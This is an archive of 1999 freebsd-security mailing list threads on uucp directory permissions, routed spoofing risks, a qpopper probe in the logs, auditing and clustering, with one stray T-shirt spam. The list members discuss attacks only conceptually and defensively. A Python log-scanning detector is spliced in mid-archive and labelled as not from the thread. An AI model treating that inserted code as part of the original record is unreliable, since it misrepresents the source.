> > On my 2.2.8-REL box and my 3.1-REL box the modes for user uucp's home dir
> > are both 777. Is there any particular reasoning behind this?
>
> UUCP requires the "public" directory to be mode 777. If you don't use
> UUCP, you can get rid of it altogether.
>
> - Mike

I don't use UUCP, and have disabled it. I have wondered though if this public home dir was exploitable.

There was discussion a while back about removing uucp from the base install and putting it in a port instead.

Andrew

--
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From: Matthew Dillon
Date: Fri, 2 Apr 1999 08:42:38 -0800 (PST)
To: Andrew McNaughton
Cc: Mike Holling, 0x1c, freebsd-security@FreeBSD.ORG
Subject: Re: uucp home dir mode 777?

:I don't use UUCP, and have disabled it. I have wondered though if this public
:home dir was exploitable.
:
:There was discussion a while back about removing uucp from the base install
:and putting it in a port instead.
:
:Andrew
:--
:-----------
:Andrew McNaughton
:andrew@squiz.co.nz
:http://www.newsroom.co.nz/

    Not so much exploitable as annoying. I'd like to see it moved out of the
    base install too.

-Matt

Matthew Dillon

From: James Wyatt
Date: Fri, 2 Apr 1999 13:37:23 -0600 (CST)
To: 0x1c
Cc: freebsd-security@freebsd.org
Subject: Re: uucp home dir mode 777?

On Fri, 2 Apr 1999, 0x1c wrote:
> On my 2.2.8-REL box and my 3.1-REL box the modes for user uucp's home dir
> are both 777. Is there any particular reasoning behind this?

This is not needed unless you are doing *anonymous* UUCP and allowing local users to put files there. (I usually have a uucpmgr user that owns /etc/uucp or /usr/lib/uucp and disable anon UUCP.) chmod it to 0 or 755 if you run UUCP or remove it if you don't. You can still support anon UUCP without it, but local users won't be able to exchange files with it.
Hope this helps - Jy@

From: James Wyatt
Date: Fri, 2 Apr 1999 13:42:00 -0600 (CST)
To: Andrew McNaughton
Cc: Mike Holling, 0x1c, freebsd-security@FreeBSD.ORG
Subject: Re: uucp home dir mode 777?

On Sat, 3 Apr 1999, Andrew McNaughton wrote:
> > > On my 2.2.8-REL box and my 3.1-REL box the modes for user uucp's home dir
> > > are both 777. Is there any particular reasoning behind this?
> >
> > UUCP requires the "public" directory to be mode 777. If you don't use
> > UUCP, you can get rid of it altogether.
> >
> > - Mike
>
> I don't use UUCP, and have disabled it. I have wondered though if this public
> home dir was exploitable.
>
> There was discussion a while back about removing uucp from the base install
> and putting it in a port instead.

The only thing the public dir can really do is allow someone to fill up a filesystem. A frequently large one at that. I'd rather not see it become a port, but wouldn't mind shipping with anon UUCP disabled. Kinda like we do with anon FTP now.
- Jy@

From: Ollivier Robert
Date: Fri, 2 Apr 1999 23:50:44 +0200
To: freebsd-security@FreeBSD.ORG
Subject: Re: uucp home dir mode 777?

According to Matthew Dillon:
> Not so much exploitable as annoying. I'd like to see it moved out of the
> base install too.

It is not that big and it is still widely used in some parts of Europe (phone costs mainly and its efficiency). 100% of my mail is going through UUCP...

It is like games (fortune and all), it has been part of UNIX for a long time.

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #70: Sat Feb 27 09:43:08 CET 1999

From: Dag-Erling Smorgrav
Date: 03 Apr 1999 03:36:11 +0200
To: Nicole Harrington
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Someone trying to route to my machine?

Nicole Harrington writes:
> Below are some messages I don't understand. Is someone trying to
> route to my machine to do something? [...]
>
> Mar 29 03:47:43 ton Forwarded from XXXXXXX: Forwarded from
> XXXXXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0
> impossibly lacks ifp

Why do you run routed? Unless that box is a backbone router on your LAN/WAN, you do not need, and should not run, routed.
DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From: Nicole Harrington
Date: Sat, 03 Apr 1999 12:25:07 -0800 (PST)
To: Dag-Erling Smorgrav
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Someone trying to route to my machine?

On 03-Apr-99 My Secret Spies Reported That Dag-Erling Smorgrav wrote:
> Nicole Harrington writes:
>> Below are some messages I don't understand. Is someone trying to
>> route to my machine to do something? [...]
>>
>> Mar 29 03:47:43 ton Forwarded from XXXXXXX: Forwarded from
>> XXXXXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0
>> impossibly lacks ifp
>
> Why do you run routed? Unless that box is a backbone router on your
> LAN/WAN, you do not need, and should not run, routed.
>

Yes, you are correct. I have turned it off; I never noticed it on. I have been migrating my configs since 2.2.5 and I think it was on by default then or something. It certainly is a boneheaded thing to have on. (wap)

Even so, if someone detected I was running routed, could they use that to try to route to a machine for some nefarious reason?
> DES
> --
> Dag-Erling Smorgrav - des@flood.ping.uio.no

nicole@nmhtech.com          | http://www.webweaver.net/
webmistress@dangermouse.org | http://www.dangermouse.org
- Powered by Coka Cola and FreeBSD -
- Strong enough for a man - But made for a Woman -
- I'm not ADD - I'm just Multithreaded -
- Microsoft: What bug would you like today? -

SYSADMIN(1)
Sysadmin is the keeper of all things computer, is generally harangued, must be supplied with caffeine, chocolate, and sushi in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life.

From: Jim Sander
Date: Sat, 3 Apr 1999 22:49:03 -0500 (EST)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Someone trying to route to my machine?

> Even so, if someone detected I was running routed, could they use that to try
> to route to a machine for some nefarious reason?

Yes.
In theory, routed can be used to enable someone to "remotely sniff" your machine, provided they are clever and you are not.

Also, if someone adds enough routes, you overflow some allocated space, and on many/most systems you lose network capability if not crash. (DoS attack) Old SunOS systems would crash in the *coolest* ways when you added a couple thousand routes...

-=Jim=-
Addy & Associates

From: Dag-Erling Smorgrav
Date: 04 Apr 1999 14:26:19 +0200
To: Nicole Harrington
Cc: Dag-Erling Smorgrav, freebsd-security@FreeBSD.ORG
Subject: Re: Someone trying to route to my machine?

Nicole Harrington writes:
> Even so, if someone detected I was running routed, could they use
> that to try to route to a machine for some nefarious reason?

They might fake route updates to make your computer route connections through theirs so they could sniff you or man-in-the-middle you.
DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From: watkins@io.com
Date: Sun, 4 Apr 1999 07:48:31 -0500
To: watkins@io.com
Subject: Do you have one?

Some people called the Ricky Williams Heisman Silhouette shirt, others call it the Dreaded Football Player shirt. UT and the Downtown Athletic Club have tried to ban them through the Collegiate Licensing Company, but unsuccessfully. Thousands of people have got their hands on one of these shirts. We have some as well and are offering you a chance to get yours. This is the exact same shirt that was featured in the Austin American Statesman on December 15, 1998 in the Lifestyles section.

Prices are as follows:

White shirt with burnt orange silhouette. Sizes are S, M, L, XL, and XXL. XXL's ARE $3.00 MORE!!!
1. $16 +3.20 shipping = $19.20
2. $32 +3.20 shipping = $36.20
3. $48 +4.30 shipping = $52.30
4. $62 +4.30 shipping = $66.30
5. $70 +5.40 shipping = $75.40
Each shirt after 5 shirts is $14.00 each. Please add $1.10 shipping for every 2 shirts over 5 shirts.

Burnt orange shirt with white silhouette. Sizes are L, XL, and XXL. XXL's ARE $3.00 MORE!!!
1. $18 +3.20 shipping = $21.20
2. $36 +3.20 shipping = $39.20
3. $52 +4.30 shipping = $56.30
4. $66 +4.30 shipping = $70.30
5. $80 +5.40 shipping = $85.40
Each shirt after 5 shirts is $16.00 each.
Please add $1.10 shipping for every 2 shirts over 5 shirts.

WE ALSO HAVE 3.5" x 3.5" PEELOUT VINYL STICKERS THAT GO GREAT ON WINDOWS. We will ship one free sticker per tshirt ordered. If you would like extras they are $2 each.

Shipping prices reflect US Priority Mail which takes 2-3 day delivery.

REMEMBER TO ADD $3.00 IF YOU WANT XXL. IF YOU DO NOT ADD THE $3.00 WE WILL SEND YOU AN XL INSTEAD.

Please send check or money order to:
JERIMIAH DOWDY
PO BOX 2596
AUSTIN, TX 78768

Thank you for your time and have a Happy Easter.

PS: If you are still skeptical about this offer, please send a Self Addressed Stamped Envelope along with your email address and/or telephone # and we will contact you to give you more information and a URL. We will not call you if it is long distance, so be sure to send an email address as well.

THIS IS A LIMITED OFFER! AFTER MAY 1, 1999, WE WILL NOT BE ACCEPTING ANY MORE ORDERS.

From: "KingJedi"
Subject: Can someone tell me what vm_page_free is?
Date: Sun, 4 Apr 1999 14:21:23 -0500

Apr 4 13:08:32 main /kernel: vm_page_free: freeing wired page

That was in my messages log; can anyone explain what this is? Is it a security hole or something?

The reason I'm asking is because my machine reboots after it gets one of these every few days, and it's running FreeBSD 3.1 Release #2.

Thanks,
KJ

From: Don Lewis
Date: Sun, 4 Apr 1999 16:18:09 -0700
To: Dag-Erling Smorgrav, Nicole Harrington
Subject: Re: Someone trying to route to my machine?
Cc: freebsd-security@FreeBSD.ORG

On Apr 4, 2:26pm, Dag-Erling Smorgrav wrote:
} Subject: Re: Someone trying to route to my machine?
} Nicole Harrington writes:
} > Even so, if someone detected I was running routed, could they use
} > that to try to route to a machine for some nefarious reason?
}
} They might fake route updates to make your computer route connections
} through theirs so they could sniff you or man-in-the-middle you.

This only works if their machine is on the same subnet as yours, since the next hop specified in the route must be a directly connected network. Even without RIP, they could probably do the same thing with ARP or ICMP redirects. And if they are on the same subnet, they can probably silently sniff your traffic unless your network is switched and the switch is hardened so that it can't be tricked into directing your traffic to them.

Unless the network only has one router connected to it (so that you can use a static default route), or you can use explicit static routes, you'll probably need some dynamic way of discovering the proper routes (RIP, ICMP redirects, etc.), and most of these can be spoofed.

From: Matthew Dillon
Date: Sun, 4 Apr 1999 17:16:47 -0700 (PDT)
To: "KingJedi"
Subject: Re: Can someone tell me what vm_page_free is?
:Apr 4 13:08:32 main /kernel: vm_page_free: freeing wired page
:
:that was in my messages log, can anyone explain what this is? is it a
:security hole or something?
:
:The reason Im asking is because my machine reboots after it gets one of
:these every few days and its running FreeBSD 3.1 Release #2
:
:Thanks,
:KJ

    Something in the bowels of the VM system detected an 'impossible'
    situation. It's not a security hole or anything... just a kernel bug.
    If you are running 3.1, it is possible that the bug has already been
    fixed in the current -STABLE track.

-Matt

Matthew Dillon

From: Robert Watson
Date: Mon, 5 Apr 1999 13:56:41 -0400 (EDT)
To: freebsd-security@freebsd.org
Subject: POSIX.1E auditing support, an initial pass and some questions

Over the past month, I have been working on a first pass at implementing system auditing for FreeBSD 4.0-CURRENT based on the POSIX.1E spec.
I have an initial alpha version working at this point, and had some questions about appropriate ways to hook the behavior into the kernel efficiently and effectively. The URL for the existing code is http://www.watson.org/fbsd-hardening/posix1e/

The essential scheme goes a little like this: POSIX.1E supports a flexible "audit record" designed to describe a single event, be it a kernel event or an application-submitted event. The draft defines a number of accessor routines to retrieve, manipulate, store, and submit these records from userland. The large majority of the existing code implements this API, which is described in a fair degree of depth in the man pages included with the tarball.

The kernel implementation currently makes use of an audit device (/dev/audit) to ship audit records from the kernel to a userland auditd, a daemon listening on the device, somewhat similar to syslogd and /dev/log. Auditd would be an excellent place to put filtering capabilities, and also IDS types of code. I'm currently working on a modular IDS plugin API for auditd so that modules capable of detecting various types of attacks or unusual behavior could hook into the record stream, and raise standard warnings, etc. This modular behavior is not included with the daemon; right now it just logs the audit records after doing a little filtering.

My real questions have to do with the best way to hook syscalls: the audit format, for most syscalls, requires the logging of relevant arguments, information about the acting process (and optionally objects acted upon), and the return code (or error, and what kind of error it was security-wise). All records have some standard information, and some event-specific information. The results are fairly ugly and complicated kernel hooks, so far.
First off, many times arguments are not copied into the kernel by the syscall itself, rather by a uio call as part of a vnode lookup; similarly, syscalls may exit in a number of places for a number of reasons, resulting in a lot of hook locations for the record. Right now I have hooked a few syscalls (no where near any significant number :-) as a proof-of-concept exploration of what might be involved, and am soliciting suggestions about a clean way to handle this. The code is under a 2-clause BSD-style license, and leaving aside the kernel code, should be portable to other platforms. Because this is extremely test-ish code, it's not something that anyone would want to run regularly except in a development sense. Also, without record filtering in place, even the few syscalls that are hooked generate a lot of output. However, feel free to download it, run it, etc. Because it adds new syscalls, it does require that you rebuild libc, so is probably not for the uninitiated. Please feel free to send questions to me directly or on this list; questions about the POSIX.1E spec should be addressed to the cross-platform POSIX.1E discussion list (posix1e@cyrus.watson.org). Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. 
http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 17:10:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from bureau6.utcc.utoronto.ca (bureau6.utcc.utoronto.ca [128.100.132.16]) by hub.freebsd.org (Postfix) with ESMTP id 7D66015453 for ; Tue, 6 Apr 1999 17:10:23 -0700 (PDT) (envelope-from pc.mackenzie@utoronto.ca) Received: from cgowave-45-163.cgocable.net ([24.226.45.163] HELO pauler.homer.com ident: NO-IDENT-SERVICE [port 2792]) by bureau6.utcc.utoronto.ca with SMTP id <180192-29358>; Tue, 6 Apr 1999 20:08:12 -0400 Message-Id: <4.1.19990406200132.00992430@mail.elehost.com> X-Sender: pc.mackenzie@mailbox21.utcc.utoronto.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 06 Apr 1999 20:07:42 -0400 To: freebsd-security@FreeBSD.ORG From: Paul MacKenzie Subject: Should I be worried, Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quick message to allay a few fears. The other day I found this in the logs... Apr 3 06:43:44 server popper[20031]: @m-burg-01.rewiss.fu-berlin.de: -ERR POP EOF received Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 xxx.xxx.xxx.xxx:23 in via ed0 Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 xxx.xxx.xxx.xxx:23 out via ed1 (the xxx.xxx.xxx.xxx address being the same above in both cases) This person was obviously an outsider because I have no clients in this part of the world. Any thoughts on why Qpopper send this back assuming they have no access to any e-mail addresses? As well the above error was shown a number of times for different addresses (as though a scanner was run on a certain subnet mask). Should I be concerned? 
Thanks for any insight and discussion this opens up,

Sincerely

Paul

From owner-freebsd-security Tue Apr 6 18:22:10 1999
From: Lauro Barbosa
Date: Tue, 06 Apr 1999 22:13:30 -0300
To: freebsd-security@freebsd.org
Subject: FreeBSD 2.2.8 and DES
Message-ID: <370AB13A.3F2A2042@pro.via-rs.com.br>

Hello!

Please, I need help. I have a server with FreeBSD 2.2.8 and DES installed. On this server the users can log in using login_name or login_name. (with a dot at the end), for example: john or john.

Does anybody know this problem? How can I correct it?

Sorry for my poor English. Please send me an answer in private to lauro@pro.via-rs.com.br,

thanks,
Lauro.
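As an added example (not from any message in this thread), here is a small Python detector for the pattern Paul MacKenzie describes above: the same remote address reaching one local host after another through ipfw, with popper logging an EOF for a connection that was dropped without a QUIT. The log lines, the addresses and the name-to-address map are constructed, and the year is an assumption because syslog stamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the shape of Paul's excerpt (addresses are from
# the RFC 5737 documentation ranges, not real hosts).
SAMPLE_LOG = """\
Apr  3 06:43:44 server popper[20031]: @scanner.example.net: -ERR POP EOF received
Apr  3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 192.0.2.10:22904 198.51.100.5:23 in via ed0
Apr  3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 192.0.2.10:22904 198.51.100.5:23 out via ed1
Apr  3 06:43:46 server /kernel: ipfw: 13610 Accept TCP 192.0.2.10:22905 198.51.100.6:23 in via ed0
Apr  3 06:43:46 server /kernel: ipfw: 13610 Accept TCP 192.0.2.10:22906 198.51.100.7:23 in via ed0
Apr  3 06:43:47 server /kernel: ipfw: 13610 Accept TCP 192.0.2.10:22907 198.51.100.8:110 in via ed0
Apr  3 06:50:01 server /kernel: ipfw: 13610 Accept TCP 203.0.113.4:1025 198.51.100.5:110 in via ed0
Apr  3 06:50:02 server popper[20044]: @monitor.example.org: -ERR POP EOF received
"""

# Constructed stand-in for reverse DNS: popper logs the peer's name while ipfw
# logs its address, so a name-to-address map is needed to tie the two together.
RESOLVED = {"scanner.example.net": "192.0.2.10", "monitor.example.org": "203.0.113.4"}

_STAMP = r"^(\w{3})\s+(\d+)\s+(\d\d:\d\d:\d\d)\s+\S+\s+"
IPFW_RE = re.compile(_STAMP + r"/kernel: ipfw: (\d+) (\w+) (\w+) (\S+):(\d+) (\S+):(\d+) (in|out) via (\S+)")
POPPER_RE = re.compile(_STAMP + r"popper\[\d+\]: @(\S+): -ERR POP EOF received")


def syslog_time(mon, day, hms, year=1999):
    """Syslog stamps carry no year; the caller supplies the log's year (assumed 1999 here)."""
    return datetime.strptime(f"{year} {mon} {int(day)} {hms}", "%Y %b %d %H:%M:%S")


def parse_log(text):
    """Return (inbound ipfw connections, popper EOF events) parsed from syslog text."""
    conns, eofs = [], []
    for line in text.splitlines():
        m = IPFW_RE.match(line)
        if m:
            mon, day, hms, rule, action, proto, src, sport, dst, dport, direction, iface = m.groups()
            # The 'out via ed1' entry is the same forwarded packet logged again on
            # the inside interface, so only the inbound record is kept.
            if direction == "in":
                conns.append({"time": syslog_time(mon, day, hms), "rule": int(rule), "action": action,
                              "proto": proto, "src": src, "dst": dst, "dport": int(dport), "iface": iface})
            continue
        m = POPPER_RE.match(line)
        if m:
            mon, day, hms, peer = m.groups()
            eofs.append({"time": syslog_time(mon, day, hms), "peer": peer})
    return conns, eofs


def find_scanners(conns, min_hosts=3, window=timedelta(minutes=5)):
    """Flag any source that reaches at least min_hosts distinct local hosts within one window."""
    by_src = defaultdict(list)
    for c in conns:
        by_src[c["src"]].append(c)
    flagged = {}
    for src, events in by_src.items():
        events.sort(key=lambda c: c["time"])
        for i, start in enumerate(events):
            hosts, ports, last = set(), set(), start["time"]
            for c in events[i:]:
                if c["time"] - start["time"] > window:
                    break
                hosts.add(c["dst"])
                ports.add(c["dport"])
                last = c["time"]
            if len(hosts) >= min_hosts:
                flagged[src] = {"hosts": hosts, "ports": ports, "first": start["time"], "last": last}
                break
    return flagged


def correlate_pop_eof(eofs, flagged, resolved):
    """Pair popper EOF events with flagged addresses through the name-to-address map."""
    return [(e["peer"], resolved[e["peer"]]) for e in eofs if resolved.get(e["peer"]) in flagged]


if __name__ == "__main__":
    conns, eofs = parse_log(SAMPLE_LOG)
    flagged = find_scanners(conns)
    for src, info in flagged.items():
        print(f"{src}: {len(info['hosts'])} hosts, ports {sorted(info['ports'])}, "
              f"{info['first']:%H:%M:%S}-{info['last']:%H:%M:%S}")
    for peer, addr in correlate_pop_eof(eofs, flagged, RESOLVED):
        print(f"popper EOF from {peer} ({addr}) matches a flagged source")
```

A monitoring script such as the one Joe Gleason describes later in the thread also produces the popper EOF line, which is why the EOF alone is not treated as evidence; only an EOF whose peer resolves to an address already seen sweeping several hosts is reported.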
From owner-freebsd-security Tue Apr 6 19: 9:23 1999
From: "GuangChun Wen"
Date: Wed, 7 Apr 1999 11:10:28 +0900
To:
Subject: Cluster service in FreeBSD
Message-ID: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp>

Hi everyone:

I am planning to use FreeBSD as our firewall. I wonder if there are ports or products which can automatically balance the loads between several servers, or take over a failed server with another server, maybe like the cluster service in NT?

I wonder if anybody can give me information about documents which describe such techniques.

From owner-freebsd-security Tue Apr 6 20:57:17 1999
From: David Gilbert
Date: Tue, 6 Apr 1999 23:55:04 -0400 (EDT)
To: "GuangChun Wen"
Cc:
Subject: Cluster service in FreeBSD
Message-ID: <14090.55064.212139.89533@trooper.velocet.ca>
In-Reply-To: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp>

>>>>> "GuangChun" == GuangChun Wen writes:

GuangChun> Hi everyone: I am planning to use FreeBSD as our firewall.
GuangChun> I wonder if there are ports or products which can
GuangChun> automatically balance the loads between several servers,
GuangChun> or take over a failed server with another server, maybe like
GuangChun> the cluster service in NT?

GuangChun> I wonder if anybody can give me information about documents
GuangChun> which describe such techniques.

While I'm sure that they do it differently with NT, I'd guess that you could effectively do this with some fancy routing protocols with BSD. But... then there's the issue that with NT... you want to plan for failure 'cause it's so common.

Dave.

--
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be    |
|Mail: dgilbert@velocet.net                   | equal if and only if they |
|http://www.velocet.net/~dgilbert             | are precisely opposite.   |
=========================================================GLO================

From owner-freebsd-security Tue Apr 6 21:28:10 1999
From: Andrew McNaughton
Date: Wed, 07 Apr 1999 16:25:49 +1200
To: Paul MacKenzie
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Should I be worried,
Message-Id: <199904070425.QAA03277@aniwa.sky>
In-reply-to: Your message of "Tue, 06 Apr 1999 20:07:42 -0400." <4.1.19990406200132.00992430@mail.elehost.com>

You've obviously been probed. The POP EOF message likely resulted from the connection being dropped without a QUIT command. You might care enough to verify whether this is how popper reports such a situation.

grepping the popper source for that error message is probably the fastest way to get an idea of what causes such an error message.

Andrew McNaughton

> Quick message to allay a few fears. The other day I found this in the logs...
>
> Apr 3 06:43:44 server popper[20031]: @m-burg-01.rewiss.fu-berlin.de: -ERR
> POP EOF received
> Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904
> xxx.xxx.xxx.xxx:23 in via ed0
> Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904
> xxx.xxx.xxx.xxx:23 out via ed1
>
> (the xxx.xxx.xxx.xxx address being the same above in both cases)
>
> This person was obviously an outsider because I have no clients in this
> part of the world. Any thoughts on why Qpopper sends this back assuming they
> have no access to any e-mail addresses?
>
> As well, the above error was shown a number of times for different addresses
> (as though a scanner was run on a certain subnet mask).
>
> Should I be concerned?
>
> Thanks for any insight and discussion this opens up,
>
> Sincerely
>
> Paul

--
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From owner-freebsd-security Tue Apr 6 21:40:58 1999
From: "Joe Gleason"
Date: Wed, 7 Apr 1999 00:36:42 -0400
To: "Paul MacKenzie", "Andrew McNaughton"
Cc:
Subject: Re: Should I be worried,
Message-ID: <021101be80b0$89523c60$7271a1ce@bug.tasam.com>
It is. My automated scripts that make sure TCP is still answering on ports such as 110 fill my logs with messages like:

Apr 4 20:00:14 shell1 popper[1723]: @xxx.xxxxxx.com: -ERR POP EOF received

Joe Gleason
Tasam

>
>You've obviously been probed. The POP EOF message likely resulted from the
>connection being dropped without a QUIT command. You might care enough to
>verify whether this is how popper reports such a situation.
>
>grepping the popper source for that error message is probably the fastest way
>to get an idea of what causes such an error message.
>
>Andrew McNaughton
>
>> Quick message to allay a few fears. The other day I found this in the logs...
>>
>> Apr 3 06:43:44 server popper[20031]: @m-burg-01.rewiss.fu-berlin.de: -ERR
>> POP EOF received
>> Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904
>> xxx.xxx.xxx.xxx:23 in via ed0
>> Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904
>> xxx.xxx.xxx.xxx:23 out via ed1
>>
>> (the xxx.xxx.xxx.xxx address being the same above in both cases)
>>
>> This person was obviously an outsider because I have no clients in this
>> part of the world. Any thoughts on why Qpopper sends this back assuming they
>> have no access to any e-mail addresses?
>>
>> As well, the above error was shown a number of times for different addresses
>> (as though a scanner was run on a certain subnet mask).
>>
>> Should I be concerned?
>>
>> Thanks for any insight and discussion this opens up,
>>
>> Sincerely
>>
>> Paul
>
>--
>-----------
>Andrew McNaughton
>andrew@squiz.co.nz
>http://www.newsroom.co.nz/

From owner-freebsd-security Tue Apr 6 23:14:53 1999
From: Ollivier Robert
Date: Wed, 7 Apr 1999 08:08:45 +0200
To: freebsd-security@FreeBSD.ORG
Subject: Re: Should I be worried,
Message-ID: <19990407080845.A4157@keltia.freenix.fr>
In-Reply-To: <4.1.19990406200132.00992430@mail.elehost.com>; from Paul MacKenzie on Tue, Apr 06, 1999 at 08:07:42PM -0400

According to Paul MacKenzie:
> This person was obviously an outsider because I have no clients in this
> part of the world. Any thoughts on why Qpopper sends this back assuming they
> have no access to any e-mail addresses?

This is a probe (probably from a script kiddie) for the well known qpopper bug. Contact the ISP/site who own the address and ask them to spank this sucker.

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #70: Sat Feb 27 09:43:08 CET 1999

From owner-freebsd-security Wed Apr 7 1: 3:23 1999
From: Jay Tribick
Date: Wed, 7 Apr 1999 09:01:10 +0100
To: GuangChun Wen
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Cluster service in FreeBSD
Message-ID: <19990407090110.A22226@bofh.fastnet.co.uk>
In-Reply-To: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp>; "GuangChun Wen" on 07.04.1999 @ 03:10:28 BST

Hi

> I am planning to use FreeBSD as our firewall.
> I wonder if there are ports or products which can
> automatically balance the loads between several servers,
> or take over a failed server with another server, maybe
> like the cluster service in NT?
>
> I wonder if anybody can give me information about
> documents which describe such techniques.

You may want to try the following:

http://www.eddieware.org/

What services will you be allowing to pass via your firewall?
--
Regards,

Jay Tribick

[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Wed Apr 7 1:52:31 1999
From: "Andy V. Oleynik"
Organization: M-Info
Date: Wed, 07 Apr 1999 11:56:52 +0300
To: Ollivier Robert
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Should I be worried,
Message-ID: <370B1DD3.3D2AFDA9@prime.net.ua>

Is this bug described somewhere?
Does it exist in the latest version of popper?

Ollivier Robert wrote:

> According to Paul MacKenzie:
> > This person was obviously an outsider because I have no clients in this
> > part of the world. Any thoughts on why Qpopper sends this back assuming they
> > have no access to any e-mail addresses?
>
> This is a probe (probably from a script kiddie) for the well known qpopper
> bug. Contact the ISP/site who own the address and ask them to spank this
> sucker.
> --
> Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
> FreeBSD keltia.freenix.fr 4.0-CURRENT #70: Sat Feb 27 09:43:08 CET 1999

--
WBW
Andy V. Oleynik
(When U work in virtual office U have good chance to obtain virtual money ö%-)

From owner-freebsd-security Wed Apr 7 4:58:36 1999
From: mike@sentex.net (Mike Tancsa)
Date: Wed, 07 Apr 1999 12:06:04 GMT
To: andyo@prime.net.ua ("Andy V. Oleynik")
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Should I be worried,
Message-ID: <370b49be.397943492@mail.sentex.net>

On 7 Apr 1999 04:51:03 -0400, in sentex.lists.freebsd.misc you wrote:

>Is this bug described somewhere?
>Does it exist in the latest version of popper?

Check the archives around last July-August of Bugtraq. It was a nasty bug that hit a lot of people. IIRC, it was versions prior to 2.5.

---Mike
Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp,
Waterloo, Ontario, Canada

From owner-freebsd-security Wed Apr 7 5:58:19 1999
From: "Andy V. Oleynik"
Organization: M-Info
Date: Wed, 07 Apr 1999 16:02:51 +0300
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Should I be worried,
Message-ID: <370B577A.E3CBFF5@prime.net.ua>

Thanks a lot to all :)
I use a fresh version.
The war has finished, all may go home ;)

Mike Tancsa wrote:

> On 7 Apr 1999 04:51:03 -0400, in sentex.lists.freebsd.misc you wrote:
>
> >Is this bug described somewhere?
> >Does it exist in the latest version of popper?
>
> Check the archives around last July-August of Bugtraq. It was a nasty bug
> that hit a lot of people. IIRC, it was versions prior to 2.5.
>
> ---Mike
> Mike Tancsa (mdtancsa@sentex.net)
> Sentex Communications Corp,
> Waterloo, Ontario, Canada

--
WBW
Andy V. Oleynik
(When U work in virtual office U have good chance to obtain virtual money ö%-)

From owner-freebsd-security Wed Apr 7 8:44:21 1999
From: Kenneth Ingham
Date: Wed, 7 Apr 1999 08:40:54 -0600
To: GuangChun Wen, freebsd-security@FreeBSD.ORG
Subject: Re: Cluster service in FreeBSD
Message-ID: <19990407084054.D1562@socrates.i-pi.com>
In-Reply-To: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp>; from GuangChun Wen on Wed, Apr 07, 1999 at 11:10:28AM +0900

For load balancing, you can take a look at:
http://www.stanford.edu/~riepel/lbnamed/

I have built several firewalls with FreeBSD and planning for failure is more an issue of planning for hardware failure, as these machines just do not crash. I do set up mirroring with ccd (details on what I learned about ccd are at http://www.i-pi.com/~ingham/ccd.html) to deal with the possibility of a disk failure. I have heard that there is a new mirroring facility in 3.x, but my firewall machines are all running 2.2.x.

The biggest problem I have had is on a mail server with procmail as a local delivery agent. Procmail wants to have the whole message in memory at once, and people at one of my sites have no concept of file size or transmission time (over 56KB lines), so emailing 50MB documents is a somewhat common event. With a 16MB P120, swap space is a requirement. I added an old 400MB disk as swap space and solved the problem.

Kenneth

From owner-freebsd-security Wed Apr 7 9:54:52 1999
From: "Rafael A. Reta Rodriguez"
Organization: ICAVE
Date: Wed, 07 Apr 1999 10:52:25 -0600
To: freebsd-security@FreeBSD.ORG
Subject: Re: Cluster service in FreeBSD
Message-ID: <370B8D49.634D6D55@icave.com.mx>

Kenneth Ingham wrote:

> For load balancing, you can take a look at:
> http://www.stanford.edu/~riepel/lbnamed/
>
> I have built several firewalls with FreeBSD and planning for failure is
> more an issue of planning for hardware failure, as these machines just
> do not crash. I do set up mirroring with ccd (details on what I learned
> about ccd are at http://www.i-pi.com/~ingham/ccd.html) to deal with the
